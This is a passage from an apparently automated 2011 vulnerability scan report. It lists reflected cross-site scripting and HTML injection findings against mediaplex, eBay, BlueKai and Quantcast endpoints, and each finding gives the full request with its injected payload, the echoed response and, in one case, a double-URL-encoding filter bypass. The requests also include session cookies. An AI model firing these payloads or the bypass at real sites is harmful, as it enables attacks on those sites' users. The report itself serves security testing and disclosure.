<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?3e06b";alert(1)//0812ffa0161http://altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D5110661&clickTag=http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885
...[SNIP]...

1.119. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82a0"><script>alert(1)</script>4476f6b8c89 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D5110661&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3fd82a0"><script>alert(1)</script>4476f6b8c89 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:21 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6963
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?d82a0"><script>alert(1)</script>4476f6b8c89http://altfarm.mediaplex.com/ad/ck/10105-114325-17214-18?mpt=5110661" TARGET="_blank">
...[SNIP]...

1.120. http://rover.ebay.com/idmap/0 [footer&cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/idmap/0

Issue detail

The value of the footer&cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d0c65%3balert(1)//3c480ac7649 was submitted in the footer&cb parameter. This input was echoed as d0c65;alert(1)//3c480ac7649 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /idmap/0?footer&cb=vjo.dsf.assembly.VjClientAssembler._callback0d0c65%3balert(1)//3c480ac7649&_vrdm=1297449096889 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://www.ebay.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cssg=15fccc2d12e0a02652943d14ffeea689; s=CgAD4ACBNVtG0MTVmY2NjMmQxMmUwYTAyNjUyOTQzZDE0ZmZlZWE2ODmOKdKX; nonsession=CgADKACBWu4G0MTVmY2NjMmQxMmUwYTAyNjUyOTQzZDE0ZmZlZWE2OGEAywABTVWHPDEf/9BP; dp1=bu1p/QEBfX0BAX19AQA**4f36b3b4^tzo/1685117e787^; lucky9=5245946; npii=btrm/svid%3D991010211714f36b3c3^tguid/15fccc2d12e0a02652943d14ffeea68a4f36b3c3^cguid/f65c9e8712d0a0aa12e4b294ff6547f14f36b3c3^; ebay=%5Ecv%3D15555%5Esbf%3D%23100000%5Ejs%3D1%5Ecos%3D53%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.1%3F17613-12e15fe4b6c
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: text/json
Date: Fri, 11 Feb 2011 18:31:50 GMT
Content-Length: 103

try{vjo.dsf.assembly.VjClientAssembler._callback0d0c65;alert(1)//3c480ac7649(["","",86400]);}catch(e){}

1.121. http://tags.bluekai.com/site/50 [phint parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/50

Issue detail

The value of the phint request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 353f6%2527%253balert%25281%2529%252f%252fc16c49bef95 was submitted in the phint parameter. This input was echoed as 353f6';alert(1)//c16c49bef95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the phint request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC353f6%2527%253balert%25281%2529%252f%252fc16c49bef95&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=200565765597&_trksid=%20p2041474.m622&_trkparms=clkid%3D7016594469467627520
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpE8VaQtwGt6JKHRxRlMYUehXOxymGwj1kYVzy1cny1eOvulA9hDSeRPV+7/WLPvwqdoutxBRZBQKWJA1UsT16n1RVJxRTw/Lq/z9zrJQADu2UU9GGO9BVGsj1=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqEpyKodzE/yKnx01sh2sIMfjIUcuf8JY4RytoXJocT5DctrzWZ/C0sbK2ePQXh7RgC+0L9x8KcakQaVeNEm/1Q9142UU5SKALAj2M9Ss/O92Xrq1EOyj+fAFsK1ga8Y6+FlbIlgMzPrn4RysZQTD/VxOxBe+jJgTxoEjwDQdf3okMnBTLit+ffFlpL2gXQIevpK0ovOTKYwx18+oieUQ40fB/AOEO+Px+yP5K10UfNFZltN0eglCNPEGwgLQwoY7sRf7WSh8pdxc7Hd89wP1pBy95DFZKI5GtAOLQzDEGTBes9bojZOTErVXBGaNk53pzYyTrRbnkzn2wC9+yKA7GmCsvCKu0JDqg/kLgrrVMFedxXhFX9Ii9cAAg292ERp5HHUtSvcafg8Y8C9bodR1EeWdmq1+qRc3V4CjVYx71w/D1e3fXr9O3EOTxxYJH4t0pZuGJb8qurnsNQ296i2micNHGa1z5L5xvTeZEdJOsJwbAoYI3uXKM69XKMhg9==; bklc=4d55308f; bk=yQSpJZmZF9ysHNJo; bkc=KJh5NP+/asWD9m9pK2w55z7yxq5kYXJqAZD3VakKDFOuZ67KWSNyaTBWnSiAF/u/kWoCxQd5/R1/BJ9GLGH1GG59Y/EYY//GCRo/0FOOmt5tdoA8dXwmXrtz1dd+pakda/eco6YG+MvQ9/94fjjzqyw59hS9wj69SNVs1Nv8vNlzkYIziJXzpaX0rzgaUuZjXGDc/XnKZZTT+TWfEfvd6lOUJ/92VRaBJd1e5iiL/e23OKRh0EuKXWBUtJ4EyLXMjd5hE6yRc7/9MBECdCDKekQ6clHp3drgKzDJT1n24d0MU167aIwppubx7BfOwU31rbvOm24nfRFkd+qBwHfAoFAv+IeatGmdJKpcIz4T0cH4KOG2FQsQflhry9jFe8ecJamXXWRwxWtY9AIfXlYdqxUAfNQWjkmXXOSLp6rBYkCV0+E8AJ+2lYcJkYXziKF8CwF8L2gyC5wzwj/oU2isXyA2DveBqMQGrDZ02yql0IFzy87zcIv8X0XY1XNcKOFVlpbXcp/8UfJSq8GcLHSU/CuR4HlxdPL0hxLlR8WroQezwZPTxEnaY8dxpFKZ8i5tQvkS4WdmkVO2U/AZ6d+QBLDnlX42ELnlBlbCamFebuO4fK9KkAp8yAKNXPK4oVs2EnSEqy6R7LETsz0wXNv2mGeXuMnkYX2Mw8C+Ol9rkbgg/q2o8SjTTHazZ0BuQzyaybAfQJ7iCSKNXp7pl7YmZp+3tgYEpgKcrbZUKI3STK5GsIqw70lHlqIjZXRUo7pbfGXgDClW0ICbl1mi9+llJamIXOeVjp7Vz0ntp0i/PHNvTvjTTPazbtfzgfUaFVGIKS5A242W16TwV+a4EeTrrPT0Ek5lYm++gCgQlz55rr1XlJxFf1cILH3+yWhlkr8kOp4aYN5QwSu6RJdL1oyLZKva3fE8kZ7rNLjFLhorkw0Fh7Y+BHydSzAvV1sir+4w4uKeIbfArAHa20I+cM8qyLX7clJpVd2yetndWab775KX0SDjladdzL5QFhRsgEbYtNB6DpXpKyffG2AFWgZ2u5pjK5paAFNcewXchwiH2x==; bkst=KJhkAnNv96WDCxzBYYqOyk/DYyLnPIq7p+0jxixZSXyZi6Q6DjrxpHoJk/6sTb3BMSt5gteoWtQkwGYkRsV77VIQLNLJlrg07U18C8LCE8wWpF+ahzIxjfLFWv8NV0+xMQAj5ue9y9kWtcUY+QRCOOgEh4MBLd8Ub8XQGIQGsLHHqHy+IgjGZQ9aTWoEek/pQ6oydEsV0awjBYl5dK04bXzDl4hc5hqBWfX6G1KBJ7MPA323y6S840qweb35653sWAapYpbEwF4Vm6mvOq4rrANdXXugRgZNcD4fkXmTTQpgXwmNRZl8UBGHaxUeMEszYD6jYFa07uEmogJCkWFvrWODisi6W5t2cuFw8x7JAzBN+IB57HqfrN8diu4XNFJaWF4YkLwLApuP/WDnxZe/mE4/QpRLtf2v3RNK4RQndi28rkgN; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 11 Feb 2011 18:33:06 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=4ReD5tQsbDzsHNJo; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NV+/aaWD9m9prIFbVYUeuA6LYa2Jk3kQj4k/0D5+JFks+W/UODD+3vEDeHWokzvW4Fxsaunxxvn/WMvJ4QHY/OPsDWxoPWHuCMI6ztq7foNp4XpL4MF7lcFZpoZfuxeyBAVepITuoTq4AdY/MKeKGBMSY1yjT5hebfAcN7swOc/lvefQT18HUsUMeQar3XZHmcRxNrI3AcRGoFsWK069K2LOPArkAhmTuyvTvPXTOG26paX6rEu9r6xh8xFlIU3XnDAbG8GfDlaArluccTOw79SqEtR84uY7Zw0QsjCca5BXyFzewnbzbOZw7BqBwETrlVXcsvpW2zL8bgxRwrpQN+4UXn/dx9YrdX14HUGImxdcBp+qzP/q2d9JfrJ3qrocL0BYrq2NzGdPzPm2yANTLggh+IieVc2/OJZrY6IChpRY5JdwzBgQ2uc03svva2TDOa9KgzcMpAhzqNLtIELtQ5ADnfyPIdBuMxSV8Dv2c7J2On5n1KDnIIc241ENdaAZ4KW6+NLh8xFqLOfUwxNS4vEgaBz3egdOd4yb269v2dLGf30nyWpNYsdcd+rwNN6Zj07VIXNycdqiG3Xs10I5UF2VEwcY25iAYdW9+62Jp0rZKmasTd7KBwp/OtY09+IEzd7RcNKY04xIZWlhyimTlgcTdAqBatOdIBFJP2rTOhHEFFOhRdbPJT7Rnhm+8ar26C1RwTl8RKcDglRQFNO1IzJprOd1+9nTnhUG26BINzhBXzveKs2twyNu83DE5Q/phx+wszd7peFo595lTJu6wpN4Bl5+ad4ABKZ7SOFZp8lB2fo7Yp4Bn6p82BAEk3rfeAdeSlWBzfm2ckJ1Izn2tJ2at1XhrcXsx3CrPpxlhxLwTflry4PSU5i788Blv5qdEyhMK5Y1dZJ0QI/3hPirN0fL+2A0Qez457L5aLHBIzJOrcILOsLylj732jv5ZIvaifW4To+y7I0xMkB1XzvkHgtaCMrBIPrL6MVvd8PnPNQ2XHmVPvzPnn3f/g7FJcw4PPyjGl720IicEhqwImxMeZfgcITIleIWNhMwSXfAQZErglI8xlYdaQSMwIothc+BI87jLfQdZF6LCMLXkML+Ap+wzKxhb4XIxnqq; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJpf01F9XvQCNJKHyRWJhonMCfcDGqJ1enGXe9hqlyRYhVjyyNMKDakZCMrXWeWZOCAIOGRYP7IQgY0Dhzp99juPAwxsiGAYhS8SmyBj37YEJfWh1eh8SKFnhiecOhmEOnJu2qV9bQYS/iJw; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsn/pgOCuWkvuDT0BDTp1MDlLpxlufWy1WLh1fs61nz61E90uDLtOL3j3PL783xVkVQRSrggJhrSJj+RJ3VZVjGISQMNOHgWy1Sxka6zEylE9aj8va9=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkp1=KJhMRZOQ19niHytCFGy199y79MG=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJ0P6NN/DtWROdedp+H+jk7BYpdYuLox12WttNprlEJ+SV1r7/aWkJYG854Xra9GWfDgn2J90GaYOH3hynE9hefG/GyiMexHP+AYxfgG/ignb7lwb5QXnkyceQIell7twXdp7Cxk/W1S9eV2j8L5PAir1eeH3Qvtfn3odo7/43kYQqarTJOXMpD8S2wXqcG6WKLMsSY9wOPTTbAoXuE8Igrz4hX1adD+s4FMC8/eXusRoJaFpEAEhQw0Yihud0pd431ih55fwtEb2V+QNQeHHJkDh4LaIFSVBZeTG2lbRIeECnUTmOsgMVwKEUtar3f9AigB/dVLwTzjnPOA0x6o8Elkt9YCdXvjX+sbgk/iPMo9Z72pm393ZNj85FFb0vQXbIKj3UmNmSNWgnx8aH+NxaBz5LtAH+hFVjiyUtZKvrgeDDS2tVcq5AWgwxIY005ijPTBndDEwEasN8nFMwilMX962RVMzKc2V+dXqwT8tIr80XoEhweSN+a5buua4wT1w4eQ3N6NrYJwurDPtViyATyzemmupM4ywQCZb++S8LoFSXP2UuLV8k76bLVbL2jt6CECwFYtXKv4dAq3YdqNZJTL0dmn8ocm7IVU/8Eb3fN8ohB6T7fBpz9UwdL5TUt29Ki45G5ZbbE7H234KuP33DI151Htb9nfcQKBynr7TfRrFVdIkTSLoUAvKSgJRqep+AMffft6zIFNEm7XoU7bmmS2+wdHfb3vC6Rhp8Hs+ZpII3cceVm2M4yX8HQiQmFs+h1sy7pxVievJDBNLsNadCCIdr03KlTFNFy4U+TIcJEeKpYdRpV4jrKmlEsh+tc2mpUYd8yzVmt8bBymiX4AdpFTrtztodDTRQS14uVbKH1AIhnwwlB9wcVv2dn1ltfgUDQ=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 12-Feb-2011 18:33:06 GMT; path=/; domain=.bluekai.com
BK-Server: 7b05
Content-Length: 803
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=ebayus_cs=1&betq=7847=399109" width=1 height=1 border=0 alt="">
<img sr
...[SNIP]...
<script>var referrer='http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=200565765597&_trksid=%20p2041474.m622&_trkparms=clkid%3D7016594469467627520'; var hashID='dbdcb53f2576976d806d6498794024fc353f6';alert(1)//c16c49bef95'; var taxonomyJSON=[[27651,5540,5266,3177,19,3],[79063,6463]];</script>
...[SNIP]...

1.122. http://www.quantcast.com/apple.com [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/apple.com

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f1c"><a>dc7e22d6cf4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /apple.comd7f1c"><a>dc7e22d6cf4?country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.12.8.1297448606931; qcPageID=0; qcVisitor=2|77|1296918427290|25|NOTSET; JSESSIONID=6CB480AE45924B3597756EE03BCB1066

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B696BE8FDB03B3892C28764A3C84D5EB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:24:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" apple.comd7f1c"><a>dc7e22d6cf4" />
...[SNIP]...

1.123. http://www.quantcast.com/apple.com [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/apple.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2ef0<a>e3e08ee9873 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /apple.comd2ef0<a>e3e08ee9873?country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.12.8.1297448606931; qcPageID=0; qcVisitor=2|77|1296918427290|25|NOTSET; JSESSIONID=6CB480AE45924B3597756EE03BCB1066

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=40E0F9BE9C324C22A3B0584DE1A0A608; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:24:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> apple.comd2ef0<a>e3e08ee9873</em>
...[SNIP]...

1.124. http://www.quantcast.com/global/personalHeader [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/global/personalHeader

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f922<a>d0926895987 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /global1f922<a>d0926895987/personalHeader HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; qcVisitor=2|77|1296918427290|14|NOTSET; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BDCDD0C1B3F55A09156E15D6B246DEF1; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> global1f922<a>d0926895987 personalHeader</em>
...[SNIP]...

1.125. http://www.quantcast.com/global/personalHeader [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/global/personalHeader

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9afd2"><a>2ef011890f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /global9afd2"><a>2ef011890f3/personalHeader HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; qcVisitor=2|77|1296918427290|14|NOTSET; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F50361B795E3A278CD6BCEFE92800E06; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" global9afd2"><a>2ef011890f3 personalHeader" />
...[SNIP]...

1.126. http://www.quantcast.com/global/personalHeader [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/global/personalHeader

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef39e"><a>975c049f655 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /global/personalHeaderef39e"><a>975c049f655 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; qcVisitor=2|77|1296918427290|14|NOTSET; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3DC377B5134E59FE12C5583395E73637; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" global personalHeaderef39e"><a>975c049f655" />
...[SNIP]...

1.127. http://www.quantcast.com/hulu.com [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/hulu.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b375<a>5529af5d66b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hulu.com8b375<a>5529af5d66b?country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
